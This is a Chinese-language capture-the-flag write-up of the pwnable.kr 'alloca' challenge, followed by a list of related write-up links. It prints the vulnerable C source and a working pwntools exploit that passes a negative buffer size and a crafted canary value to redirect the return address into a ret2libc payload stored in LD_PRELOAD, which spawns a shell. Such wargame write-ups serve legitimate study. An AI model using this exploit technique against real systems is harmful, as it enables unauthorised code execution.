0x00:

好久没玩了...去年十月以后就没玩过了TAT 这几天把peach的坑,winafl的坑填了下,就来搞下pwn。

0x01:

这个程序是给了源码的

#include <stdio.h>

#include <string.h>

#include <stdlib.h>

void clear_newlines(){

    int c;

    do{

        c = getchar();

    }while (c != '\n' && c != EOF);

}

int g_canary;

int check_canary(int canary){

    int result = canary ^ g_canary;

    int canary_after = canary;

    int canary_before = g_canary;

    printf("canary before using buffer : %d\n", canary_before);

    printf("canary after using buffer : %d\n\n", canary_after);

    if(result != 0){

        printf("what the f...??? how did you fucked this buffer????\n");

    }

    else{

        printf("I told you so. its trivially easy to prevent BOF :)\n");

        printf("therefore as you can see, it is easy to make secure software\n");

    }

    return result;

}

int size;

char* buffer;

int main(){

    printf("- BOF(buffer overflow) is very easy to prevent. here is how to.\n\n");

    sleep(2);

    printf("   1. allocate the buffer size only as you need it\n");

    printf("   2. know your buffer size and limit the input length\n\n");

    printf("- simple right?. let me show you.\n\n");

    sleep(2);

    printf("- whats the maximum length of your buffer?(byte) : ");

    scanf("%d", &size);

    clear_newlines();

        printf("- give me your random canary number to prove there is no BOF : ");

        scanf("%d", &g_canary);

        clear_newlines();

    printf("- ok lets allocate a buffer of length %d\n\n", size);

    sleep(1);

    buffer = alloca( size + 4 );    // 4 is for canary

    printf("- now, lets put canary at the end of the buffer and get your data\n");

    printf("- don't worry! fgets() securely limits your input after %d bytes :)\n", size);

    printf("- if canary is not changed, we can prove there is no BOF :)\n");

    printf("$ ");

    memcpy(buffer+size, &g_canary, 4);    // canary will detect overflow.

    fgets(buffer, size, stdin);        // there is no way you can exploit this.

    printf("\n");

    printf("- now lets check canary to see if there was overflow\n\n");

    check_canary( *((int*)(buffer+size)) );

    return 0;

}

主要还是需要突破他的防护,拿到shell。

看下bin文件开了什么保护:

调试发现,check_canary()函数返回的时候,如果恰当的设置g_canary的值,就可以控制返回地值。



然后我就卡在这里了...开启了NX,只能ROP的思路搞,但是ROP链又不知道哪里放置。

0x02:

后来参考了别人的做法,才发现这是个本地利用...直接按照以前玩overthewire学来的套路就可以:sc放在环境变量离,然后确定地址,直接改返回地值过去就可以了。

不过首先要利用ulimit -s unlimited去固定下libc的加载地址,然后才可以确定system()和/bin/sh地址。

附上我本地调试的时候的exp,环境不同,所以地址可能不同。

from pwn import *

import os

off_system  = 0x0003d3e0    # objdump -d /lib/i386-linux-gnu/libc.so.6 | grep system

off_shell   = 0x0015ea69    # grep -oba /bin/sh /lib/i386-linux-gnu/libc.so.6

adr_libc    = 0x40047000    # ldd alloca

adr_payload = 0x40025857    # searchmem "AAAA"

payload     =   p32(adr_libc + off_system)

payload     +=  p32(0xdeadbeef)

payload     +=  p32(adr_libc + off_shell)

#test = "AAAABBBBCCCC"

#p = process('./alloca', env = {'LD_PRELOAD': test})

p = process('./alloca', env = {'LD_PRELOAD': payload})

#raw_input("$$")

p.sendline(str(-92))

p.sendline(str((adr_payload + 4) ^ 0x08048250))

p.interactive()

'''

0x40025857 ^ 0x08048250 --> 0x4806da07

Cannot access memory at address 0x4806da03

0x40025857 + 4

'''

0x03:参考链接

http://0byjwzsf.me/2016/08/08/pwnable-rookiss-alloca/#more

[pwnable.kr]--alloca的更多相关文章

  1. pwnable.kr的passcode

    前段时间找到一个练习pwn的网站,pwnable.kr 这里记录其中的passcode的做题过程,给自己加深印象. 废话不多说了,看一下题目, 看到题目,就ssh连接进去,就看到三个文件如下 看了一下 ...

  2. pwnable.kr bof之write up

    这一题与前两题不同,用到了静态调试工具ida 首先题中给出了源码: #include <stdio.h> #include <string.h> #include <st ...

  3. pwnable.kr col之write up

    Daddy told me about cool MD5 hash collision today. I wanna do something like that too! ssh col@pwnab ...

  4. pwnable.kr brainfuck之write up

    I made a simple brain-fuck language emulation program written in C. The [ ] commands are not impleme ...

  5. pwnable.kr login之write up

    main函数如下: auth函数如下: 程序的流程如下: 输入Authenticate值,并base64解码,将解码的值代入md5_auth函数中 mad5_auth()生成其MD5值并与f87cd6 ...

  6. pwnable.kr详细通关秘籍(二)

    i春秋作家:W1ngs 原文来自:pwnable.kr详细通关秘籍(二) 0x00 input 首先看一下代码: 可以看到程序总共有五步,全部都满足了才可以得到flag,那我们就一步一步来看 这道题考 ...

  7. pwnable.kr simple login writeup

    这道题是pwnable.kr Rookiss部分的simple login,需要我们去覆盖程序的ebp,eip,esp去改变程序的执行流程   主要逻辑是输入一个字符串,base64解码后看是否与题目 ...

  8. pwnable.kr第二天

    3.bof 这题就是简单的数组越界覆盖,直接用gdb 调试出偏移就ok from pwn import * context.log_level='debug' payload='A'*52+p32(0 ...

  9. [pwnable.kr]Dragon

    0x00: dragon 是一个UAF漏洞的利用. UseAfterFree 是堆的漏洞利用的一种 简单介绍 https://www.owasp.org/index.php/Using_freed_m ...

随机推荐

  1. Yii2.0 queue

    https://www.yiichina.com/tutorial/1635 https://my.oschina.net/gcdong/blog/3031113 https://www.yii-ch ...

  2. thinkphp命令行生成模型类

    thinkphp命令行生成模型类 当你需要创建大量的模型类的时候,不妨考虑下命令行生成,可以快速创建模型类. 在windows下面,使用Win+R输入cmd进入命令控制台,切换到项目根目录(也就是th ...

  3. 基于全备份+binlog方式恢复数据

    基于全备份+binlog方式恢复数据 将bkxt从库的全备份在rescs5上恢复一份,用cmdb操作 恢复全备后执行如下操作 set global read_only=OFF; stop slave; ...

  4. Kafka网络模型

    摘要:很多人喜欢把RocketMQ与Kafka做对比,其实这两款消息队列的网络通信层还是比较相似的,本文就为大家简要地介绍下Kafka的NIO网络通信模型,通过对Kafka源码的分析来简述其React ...

  5. JS基础_for循环练习3

    <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title> ...

  6. JS基础_for循环练习1

    <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title> ...

  7. centos7---ansible批量部署

    CentOS7系统 ansible自动化部署多台服务器部署   Ansible工作机制  从图中可以看出ansible分为以下几个部份: 1> Control Node:控制机器2> In ...

  8. Js-声明变量

    JS声明变量 js声明变量的方式有3种:let,const,var 1.const如果定义简单数据类型,变成常量,变量值不可以更改. const name="lili"; name ...

  9. js小功能3:一个简单的计算器功能

    html: <input type='text' id='txt1' /> <select id='select'> <option value='+'>+< ...

  10. java(堆、栈、常量池)

    参考链接: https://www.cnblogs.com/wanson/articles/10819189.html